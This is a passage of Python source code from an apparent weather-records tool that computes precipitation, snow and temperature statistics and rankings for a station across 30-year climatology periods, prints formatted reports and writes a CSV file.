mean(e[YYYY]["tmax"]) climo30yrs[c]["tmaxPROP"]["e_max"][1] = [] climo30yrs[c]["tmaxPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tmax"]) == climo30yrs[c]["tmaxPROP"]["e_min"][0]: climo30yrs[c]["tmaxPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tmax"]) < climo30yrs[c]["tmaxPROP"]["e_min"][0]: climo30yrs[c]["tmaxPROP"]["e_min"][0] = mean(e[YYYY]["tmax"]) climo30yrs[c]["tmaxPROP"]["e_min"][1] = [] climo30yrs[c]["tmaxPROP"]["e_min"][1].append(YYYY) # TMIN for x in e[YYYY]["tmin"]: alltime["tmin"].append(x) if len(e[YYYY]["tmin"]) > EXCLD: if mean(e[YYYY]["tmin"]) == alltime["tminPROP"]["e_max"][0]: alltime["tminPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tmin"]) > alltime["tminPROP"]["e_max"][0]: alltime["tminPROP"]["e_max"][0] = mean(e[YYYY]["tmin"]) alltime["tminPROP"]["e_max"][1] = [] alltime["tminPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tmin"]) == alltime["tminPROP"]["e_min"][0]: alltime["tminPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tmin"]) < alltime["tminPROP"]["e_min"][0]: alltime["tminPROP"]["e_min"][0] = mean(e[YYYY]["tmin"]) alltime["tminPROP"]["e_min"][1] = [] alltime["tminPROP"]["e_min"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in e[YYYY]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(e[YYYY]["tmin"]) > EXCLD: if mean(e[YYYY]["tmin"]) == climo30yrs[c]["tminPROP"]["e_max"][0]: climo30yrs[c]["tminPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tmin"]) > climo30yrs[c]["tminPROP"]["e_max"][0]: climo30yrs[c]["tminPROP"]["e_max"][0] = mean(e[YYYY]["tmin"]) climo30yrs[c]["tminPROP"]["e_max"][1] = [] climo30yrs[c]["tminPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tmin"]) == climo30yrs[c]["tminPROP"]["e_min"][0]: climo30yrs[c]["tminPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tmin"]) < climo30yrs[c]["tminPROP"]["e_min"][0]: climo30yrs[c]["tminPROP"]["e_min"][0] = mean(e[YYYY]["tmin"]) climo30yrs[c]["tminPROP"]["e_min"][1] = [] climo30yrs[c]["tminPROP"]["e_min"][1].append(YYYY) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for {} {} thru {} {}".format(calendar.month_abbr[startday.month],startday.day,calendar.month_abbr[endday.month],endday.day)) print("City: {}, {}".format(clmt["station"],clmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("Part 1: Precipitation Stats") print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^12} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^12} |".format("","DAYS","DAYS MAX","DAYS MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) # Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^12} {:-^9} {:-^9} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^9} {:-^6} {:-^12} |".format("","","","","","","","","","","")) print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>5.2f}, {:^5} {:>5}, {:^5} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^5} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["e_max_days"][0], alltime["prcpPROP"]["e_max_days"][1][0] if len(alltime["prcpPROP"]["e_max_days"][1]) == 1 else len(alltime["prcpPROP"]["e_max_days"][1]), alltime["prcpPROP"]["e_min_days"][0], alltime["prcpPROP"]["e_min_days"][1][0] if len(alltime["prcpPROP"]["e_min_days"][1]) == 1 else len(alltime["prcpPROP"]["e_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["e_max"][0],2), alltime["prcpPROP"]["e_max"][1][0] if len(alltime["prcpPROP"]["e_max"][1]) == 1 else len(alltime["prcpPROP"]["e_max"][1]), round(alltime["prcpPROP"]["e_min"][0],2), alltime["prcpPROP"]["e_min"][1][0] if len(alltime["prcpPROP"]["e_min"][1]) == 1 else len(alltime["prcpPROP"]["e_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["e_max_days"][0], alltime["snowPROP"]["e_max_days"][1][0] if len(alltime["snowPROP"]["e_max_days"][1]) == 1 else len(alltime["snowPROP"]["e_max_days"][1]), round(mean(alltime["snow"]),1) if len(alltime["snow"]) > 0 else "--", round(alltime["snowPROP"]["e_max"][0],2), alltime["snowPROP"]["e_max"][1][0] if len(alltime["snowPROP"]["e_max"][1]) == 1 else len(alltime["snowPROP"]["e_max"][1]))) for c in climo30yrs: try: print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>5.2f}, {:^5} {:>5}, {:^5} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^5} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["e_max_days"][0], climo30yrs[c]["prcpPROP"]["e_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["e_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["e_max_days"][1]), climo30yrs[c]["prcpPROP"]["e_min_days"][0], climo30yrs[c]["prcpPROP"]["e_min_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["e_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["e_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["e_max"][0],2), climo30yrs[c]["prcpPROP"]["e_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["e_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["e_max"][1]), round(climo30yrs[c]["prcpPROP"]["e_min"][0],2), climo30yrs[c]["prcpPROP"]["e_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["e_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["e_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["e_max_days"][0], climo30yrs[c]["snowPROP"]["e_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["e_max_days"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["e_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["e_max"][0],2), climo30yrs[c]["snowPROP"]["e_max"][1][0] if len(climo30yrs[c]["snowPROP"]["e_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["e_max"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: Temperature Stats") print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["e_max"][0],1), alltime["tavgPROP"]["e_max"][1][0] if len(alltime["tavgPROP"]["e_max"][1]) == 1 else len(alltime["tavgPROP"]["e_max"][1]), round(alltime["tavgPROP"]["e_min"][0],1), alltime["tavgPROP"]["e_min"][1][0] if len(alltime["tavgPROP"]["e_min"][1]) == 1 else len(alltime["tavgPROP"]["e_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["e_max"][0],1), alltime["tmaxPROP"]["e_max"][1][0] if len(alltime["tmaxPROP"]["e_max"][1]) == 1 else len(alltime["tmaxPROP"]["e_max"][1]), round(alltime["tmaxPROP"]["e_min"][0],1), alltime["tmaxPROP"]["e_min"][1][0] if len(alltime["tmaxPROP"]["e_min"][1]) == 1 else len(alltime["tmaxPROP"]["e_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["e_max"][0],1), alltime["tminPROP"]["e_max"][1][0] if len(alltime["tminPROP"]["e_max"][1]) == 1 else len(alltime["tminPROP"]["e_max"][1]), round(alltime["tminPROP"]["e_min"][0],1), alltime["tminPROP"]["e_min"][1][0] if len(alltime["tminPROP"]["e_min"][1]) == 1 else len(alltime["tminPROP"]["e_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["e_max"][0],1), climo30yrs[c]["tavgPROP"]["e_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["e_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["e_max"][1]), round(climo30yrs[c]["tavgPROP"]["e_min"][0],1), climo30yrs[c]["tavgPROP"]["e_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["e_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["e_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["e_max"][0],1), climo30yrs[c]["tmaxPROP"]["e_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["e_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["e_max"][1]), round(climo30yrs[c]["tmaxPROP"]["e_min"][0],1), climo30yrs[c]["tmaxPROP"]["e_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["e_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["e_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["e_max"][0],1), climo30yrs[c]["tminPROP"]["e_max"][1][0] if len(climo30yrs[c]["tminPROP"]["e_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["e_max"][1]), round(climo30yrs[c]["tminPROP"]["e_min"][0],1), climo30yrs[c]["tminPROP"]["e_min"][1][0] if len(climo30yrs[c]["tminPROP"]["e_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["e_min"][1]))) except Exception as er: print("ERROR: Era = {}; Exception = {}".format(c,er)) print("") if output == True: newfn = "customReport_{}{}to{}{}_".format(calendar.month_abbr[m1],d1,calendar.month_abbr[m2],d2) + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period ({}{} to {}{})".format(calendar.month_abbr[m1],d1,calendar.month_abbr[m2],d2),"PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmin"]))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmin"]))); w.write("\n") print("*** csv output successful ***") def dayRank(m,d,qty): """Returns a list of rankings (maxs and mins) based on a specific day of a specific month. It only accepts arguments for the month, day, and the how many rankings you want to list (ie, top 10; 15; etc). Passed arguments MUST be integers. dayRank(month,day,quantity) EXAMPLE: dayRank(6,27) -> Returns rankings for June 27 """ class day_attr: def __init__(self,y,number): self.year = y self.number = number if type(m) != int or type(d) != int or type(qty) != int: return print("* SORRY! Month AND Day need to be submitted as integers") if m < 1 or m > 12: return print("* Sorry! Make sure month entry is in the range [1,12]") if d < 1 or d > 31: return print("* Sorry! Invalid Day entered.") if m in [4,6,9,11] and d == 31: return print("*Sorry! Only months numbered 1,3,5,7,8,10,12 have 31 days") if m == 2 and d > 29: return print("* Sorry! February never has 30+ days") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]") DAYS_prcp = [] DAYS_snow = [] DAYS_snwd = [] DAYS_tmax = [] DAYS_tmin = [] DAYS_tavg = [] # YEARS.append(year_attr(y,round(mean(clmt[y][attribute]),1))) DAYS_prcp = [day_attr(D.year,V) for V in clmt_vars_days["prcp"] for D in clmt_vars_days["prcp"][V] if D.month == m and D.day == d] DAYS_snow = [day_attr(D.year,V) for V in clmt_vars_days["snow"] for D in clmt_vars_days["snow"][V] if D.month == m and D.day == d] DAYS_snwd = [day_attr(D.year,V) for V in clmt_vars_days["snwd"] for D in clmt_vars_days["snwd"][V] if D.month == m and D.day == d] DAYS_tmax = [day_attr(D.year,V) for V in clmt_vars_days["tmax"] for D in clmt_vars_days["tmax"][V] if D.month == m and D.day == d] DAYS_tmin = [day_attr(D.year,V) for V in clmt_vars_days["tmin"] for D in clmt_vars_days["tmin"][V] if D.month == m and D.day == d] DAYS_tavg = [day_attr(D.year,V) for V in clmt_vars_days["tavg"] for D in clmt_vars_days["tavg"][V] if D.month == m and D.day == d] DAYS_prcp.sort(key=lambda x:x.number,reverse=True) DAYS_snow.sort(key=lambda x:x.number,reverse=True) DAYS_snwd.sort(key=lambda x:x.number,reverse=True) DAYS_tmax_asc = DAYS_tmax.copy() DAYS_tmax.sort(key=lambda x:x.number,reverse=True) DAYS_tmax_asc.sort(key=lambda x:x.number) DAYS_tmin_asc = DAYS_tmin.copy() DAYS_tmin.sort(key=lambda x:x.number,reverse=True) DAYS_tmin_asc.sort(key=lambda x:x.number) DAYS_tavg_asc = DAYS_tavg.copy() DAYS_tavg.sort(key=lambda x:x.number,reverse=True) DAYS_tavg_asc.sort(key=lambda x:x.number) # This block will control if one of the above lists happen to have a length of zero; it's to avoid error if len(DAYS_prcp) == 0: DAYS_prcp = [day_attr(9999,0)] if len(DAYS_snow) == 0: DAYS_snow = [day_attr(9999,0)] if len(DAYS_snwd) == 0: DAYS_snwd = [day_attr(9999,0)] # 15|17|17|15|19|16 # print("{:2}{} {:4} {:3} | {:2}{} {:4} {:3} | {:2}{} {:4} {:3} | {:2}{} {:4} {:3}" TMAX and TMIN # print(" {:2}{} {:4} {:5} | {:2}{} {:4} {:4}" PRCP and SNOW print("") print("{:^59}".format("Precipitation Records for {} {}".format(calendar.month_name[m],d))) print("{:^59}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:-^59}".format("")) print("{:^19}|{:^19}|{:^19}".format("Rain","Snow","Snow Depth")) print("{:-^19}|{:-^19}|{:-^19}".format("","","")) i = 0; j = 0; k = 0 ranked_i = []; ranked_j = []; ranked_k = [] for x in range(max(len(DAYS_prcp),len(DAYS_snow),len(DAYS_snwd))): if x == 0: i += 1; j += 1; k += 1 else: try: if DAYS_prcp[x].number != DAYS_prcp[x-1].number: i += 1 if DAYS_prcp[x].number == 0: i = qty + 1 except: i = qty + 1 try: if DAYS_snow[x].number != DAYS_snow[x-1].number: j += 1 if DAYS_snow[x].number == 0: j = qty + 1 except: j = qty + 1 try: if DAYS_snwd[x].number != DAYS_snwd[x-1].number: k += 1 if DAYS_snwd[x].number == 0: k = qty + 1 except: k = qty + 1 #print(i,j,k) if all(QTY > qty for QTY in [i,j,k]): break else: try: print(" {} | {} | {} ".format( "{:2}{} {:4} {}".format( i if i not in ranked_i and i <= qty and DAYS_prcp[x].number > 0 else "", "." if i not in ranked_i and i <= qty and DAYS_prcp[x].number > 0 else " ", DAYS_prcp[x].year if i <= qty and x <= len(DAYS_prcp)-1 and DAYS_prcp[x].number > 0 else "", "{:5.2f}".format(DAYS_prcp[x].number) if i <= qty and x <= len(DAYS_prcp)-1 and DAYS_prcp[x].number > 0 else " " ), "{:2}{} {:4} {}".format( j if j not in ranked_j and j <= qty and DAYS_snow[x].number > 0 else "", "." if j not in ranked_j and j <= qty and DAYS_snow[x].number > 0 else " ", DAYS_snow[x].year if j <= qty and x <= len(DAYS_snow)-1 and DAYS_snow[x].number > 0 else "", "{:5.1f}".format(DAYS_snow[x].number) if j <= qty and x <= len(DAYS_snow)-1 and DAYS_snow[x].number > 0 else " " ), "{:2}{} {:4} {}".format( k if k not in ranked_k and k <= qty and DAYS_snwd[x].number > 0 else "", "." if k not in ranked_k and k <= qty and DAYS_snwd[x].number > 0 else " ", DAYS_snwd[x].year if k <= qty and x <= len(DAYS_snwd)-1 and DAYS_snwd[x].number > 0 else "", "{:5.1f}".format(DAYS_snwd[x].number) if k <= qty and x <= len(DAYS_snwd)-1 and DAYS_snwd[x].number > 0 else " " ) )) except Exception as e: print(x,i,j,k) traceback.print_tb(e) if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) print("\n{:^102}".format("Temperature Records for {} {}".format(calendar.month_name[m],d))) print("{:^102}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:-^102}".format("")) print("{:^34}|{:^33}|{:^33}".format("TAVG","TMAX","TMIN")) print("{:-^34}|{:-^33}|{:-^33}".format("","","")) print("{:^16}|{:^17}|{:^16}|{:^16}|{:^16}|{:^16}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest")) print("{:-^16}|{:-^17}|{:-^16}|{:-^16}|{:-^16}|{:-^16}".format("","","","","","")) i = 0; j = 0; k = 0; l = 0; m = 0; n = 0 ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = [] for x in range(max(len(DAYS_tavg),len(DAYS_tmax),len(DAYS_tmin))): if x == 0: i += 1; j += 1; k += 1; l += 1; m += 1; n += 1 else: try: if DAYS_tavg[x].number != DAYS_tavg[x-1].number: i += 1 except: i = qty + 1 try: if DAYS_tavg_asc[x].number != DAYS_tavg_asc[x-1].number: j += 1 except: j = qty + 1 try: if DAYS_tmax[x].number != DAYS_tmax[x-1].number: k += 1 except: k = qty + 1 try: if DAYS_tmax_asc[x].number != DAYS_tmax_asc[x-1].number: l += 1 except: l = qty + 1 try: if DAYS_tmin[x].number != DAYS_tmin[x-1].number: m += 1 except: m = qty + 1 try: if DAYS_tmin_asc[x].number != DAYS_tmin_asc[x-1].number: n += 1 except: n = qty + 1 if all(QTY > qty for QTY in [i,j,k,l,m,n]): break else: print("{} | {} | {} | {} | {} | {} ".format( "{:2}{} {:4} {}".format( i if i not in ranked_i and i <= qty else "", "." if i not in ranked_i and i <= qty else " ", DAYS_tavg[x].year if i <= qty else "", "{:5.1f}".format(DAYS_tavg[x].number) if i <= qty else " " ), "{:2}{} {:4} {}".format( j if j not in ranked_j and j <= qty else "", "." if j not in ranked_j and j <= qty else " ", DAYS_tavg_asc[x].year if j <= qty else "", "{:5.1f}".format(DAYS_tavg_asc[x].number) if j <= qty else " " ), "{:2}{} {:4} {}".format( k if k not in ranked_k and k <= qty else "", "." if k not in ranked_k and k <= qty else " ", DAYS_tmax[x].year if k <= qty else "", "{:4}".format(DAYS_tmax[x].number) if k <= qty else " " ), "{:2}{} {:4} {}".format( l if l not in ranked_l and l <= qty else "", "." if l not in ranked_l and l <= qty else " ", DAYS_tmax_asc[x].year if l <= qty else "", "{:4}".format(DAYS_tmax_asc[x].number) if l <= qty else " " ), "{:2}{} {:4} {}".format( m if m not in ranked_m and m <= qty else "", "." if m not in ranked_m and m <= qty else " ", DAYS_tmin[x].year if m <= qty else "", "{:4}".format(DAYS_tmin[x].number) if m <= qty else " " ), "{:2}{} {:4} {}".format( n if n not in ranked_n and n <= qty else "", "." if n not in ranked_n and n <= qty else " ", DAYS_tmin_asc[x].year if n <= qty else "", "{:4}".format(DAYS_tmin_asc[x].number) if n <= qty else " " ) )) #print("---",i,j,k,l,m,n,"---") if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) print("") def weekRank(mo,d,qty): """Returns a list of rankings (maxs and mins) based on a specific week. The passed arguments of month and day will be the center of the week. It only accepts arguments for the month, day, and the how many rankings you want to list (ie, top 10; 15; etc). Passed arguments MUST be integers. weekRank(month,day,quantity) EXAMPLE: weekRank(1,30) -> Returns rankings for the week centered on January 30 (from Jan 27 to Feb 2) """ class week_attr: def __init__(self,y,number): self.year = y self.number = number if type(mo) != int or type(d) != int or type(qty) != int: return print("* SORRY! Month AND Day need to be submitted as integers") if mo < 1 or mo > 12: return print("* Sorry! Make sure month entry is in the range [1,12]") if d < 1 or d > 31: return print("* Sorry! Invalid Day entered.") if mo in [4,6,9,11] and d == 31: return print("*Sorry! Only months numbered 1,3,5,7,8,10,12 have 31 days") if mo == 2 and d > 29: return print("* Sorry! February never has 30+ days") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]") WEEKS_prcp = [] WEEKS_snow = [] WEEKS_snwd = [] WEEKS_tavg = [] WEEKS_tmax = [] WEEKS_tmin = [] if mo == 2 and d == 29: d = 28 wkorig = datetime.date(1999,mo,d) - datetime.timedelta(days=3) for y in [YR for YR in clmt if type(YR) == int]: wkstart = datetime.date(y,mo,d) - datetime.timedelta(days=3) wklist = [] wk_prcp = [] wk_snow = [] wk_snwd = [] wk_tavg = [] wk_tmax = [] wk_tmin = [] for DAY in range(7): wklist.append(wkstart) wkstart += datetime.timedelta(days=1) for DAY in wklist: #input(clmt[y][DAY.month][DAY.day].daystr) #if y == 1984: #print("HI TEMP: {}; DAY: {}".format(clmt[y][DAY.month][DAY.day].tmax,clmt[y][DAY.month][DAY.day].daystr)) try: #print(clmt[y][DAY.month][DAY.day].prcpQ in ignoreflags) if clmt[DAY.year][DAY.month][DAY.day].prcpQ in ignoreflags: wk_prcp.append(float(clmt[DAY.year][DAY.month][DAY.day].prcp)) except: pass try: if clmt[DAY.year][DAY.month][DAY.day].snowQ in ignoreflags: wk_snow.append(float(clmt[DAY.year][DAY.month][DAY.day].snow)) except: pass try: if clmt[DAY.year][DAY.month][DAY.day].snwdQ in ignoreflags: wk_snwd.append(float(clmt[DAY.year][DAY.month][DAY.day].snwd)) except: pass try: if clmt[DAY.year][DAY.month][DAY.day].tmaxQ in ignoreflags and clmt[DAY.year][DAY.month][DAY.day].tmax not in ["9999","-9999",""] and clmt[DAY.year][DAY.month][DAY.day].tminQ in ignoreflags and clmt[DAY.year][DAY.month][DAY.day].tmin not in ["9999","-9999",""]: wk_tavg.append(int(clmt[DAY.year][DAY.month][DAY.day].tmax)) wk_tavg.append(int(clmt[DAY.year][DAY.month][DAY.day].tmin)) except: pass try: if clmt[DAY.year][DAY.month][DAY.day].tmaxQ in ignoreflags: wk_tmax.append(int(clmt[DAY.year][DAY.month][DAY.day].tmax)) except: pass try: if clmt[DAY.year][DAY.month][DAY.day].tminQ in ignoreflags: wk_tmin.append(int(clmt[DAY.year][DAY.month][DAY.day].tmin)) except: pass try: WEEKS_prcp.append(week_attr(y,round(sum(wk_prcp),2))) except: pass try: WEEKS_snow.append(week_attr(y,round(sum(wk_snow),1))) except: pass if len(wk_snwd) > 0: try: WEEKS_snwd.append(week_attr(y,round(sum(wk_snwd)/7,1))) except: pass if len(wk_tavg) > excludeweek_tavg: try: WEEKS_tavg.append(week_attr(y,round(mean(wk_tavg),1))) except: pass if len(wk_tmax) > excludeweek: try: WEEKS_tmax.append(week_attr(y,round(mean(wk_tmax),1))) #if y == 1984: print(round(mean(wk_tmax),1)) except: pass if len(wk_tmin) > excludeweek: try: WEEKS_tmin.append(week_attr(y,round(mean(wk_tmin),1))) except: pass #print(len(WEEKS_tavg),len(WEEKS_tmax),len(WEEKS_tmin),len(WEEKS_prcp),len(WEEKS_snow)) #input() WEEKS_prcp.sort(key=lambda x:x.number,reverse=True) WEEKS_snow.sort(key=lambda x:x.number,reverse=True) WEEKS_snwd.sort(key=lambda x:x.number,reverse=True) WEEKS_tavg_asc = WEEKS_tavg.copy() WEEKS_tavg.sort(key=lambda x:x.number,reverse=True) WEEKS_tavg_asc.sort(key=lambda x:x.number) WEEKS_tmax_asc = WEEKS_tmax.copy() WEEKS_tmax.sort(key=lambda x:x.number,reverse=True) WEEKS_tmax_asc.sort(key=lambda x:x.number) WEEKS_tmin_asc = WEEKS_tmin.copy() WEEKS_tmin.sort(key=lambda x:x.number,reverse=True) WEEKS_tmin_asc.sort(key=lambda x:x.number) #for x in WEEKS_tavg: #print(x.year,"-",x.number) #input() print("") print("{:^59}".format("Precipitation Records for the Week of {} {} - {} {}".format(calendar.month_abbr[wkorig.month],wkorig.day, calendar.month_abbr[(wkorig + datetime.timedelta(days=6)).month],(wkorig + datetime.timedelta(days=6)).day))) print("{:^59}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:^59}".format("Weeks 